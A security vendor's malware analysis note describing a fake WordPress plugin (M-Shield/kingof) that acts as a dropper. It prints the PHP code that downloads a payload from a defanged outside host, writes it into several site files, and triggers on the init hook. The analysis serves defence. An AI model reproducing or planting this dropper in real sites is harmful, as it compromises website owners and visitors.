Fake M-Shield WordPress Plugin

  • April 21, 2020
Labs Note

During a recent malware investigation, we found a fake WordPress plugin called M-Shield. We also found almost an identical plugin under the name kingof, with malicious code hosted in the file: ./wp-content/plugins/kingof/kingof.php

Based on the patterns commonly used for malware droppers, we suspect that this same plugin is circulating with a variety of different names. Since neither the M-Shield nor the kingof plugins exist in the official WordPress repository, the malicious component was most likely injected into the WordPress website after the initial compromise.

The plugin code loops through an array of “random” files to check if they exist and their filesize is lower than 1000 bytes. If the condition isn’t met, the script downloads this malicious wsos.txt file from 24hod[.]sk using the function file_get_contents() and injects into contents into the files from the $amb array.

<?php
function shield_01()
{
    $amb = array('wp-pwd.php', 'wp-shield.php', 'wp-logout.php', 'wp-config-proto.php', 'wp-content/themes/ms.cache.php');
    foreach($amb as $f) {
          $f=ABSPATH.$f;
            if(!file_exists($f)||filesize($f)<1000) {
                if(!$wsd) 
                $wsd = file_get_contents('hxxp://www[.]24hod[.]sk/colours/layout/wsos.txt');
              if($wsd)
                file_put_contents($f,$wsd);
          }
    }
}

Once the malicious payload has been delivered, the plugin uses two different methods to execute the malware.

First, the malware leverages a WordPress function called add_action() that attempts to run shield_01() when the init hook is executed. If the function add_action() doesn’t exist, the malicious code calls shield_01() directly.

if(function_exists('add_action')){
    add_action( 'init', 'shield_01');
}else{
    shield_01();
}

It’s important to note that attackers can leverage plugin vulnerabilities and other malicious code even if a plugin is deactivated in your WordPress environment.

We highly recommend regularly auditing your plugins and themes and removing any unknown or unused components from your website. Our free guides offer more WordPress security hardening tips to help you secure your environment.

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Related Tags
Related Categories
You May Also Like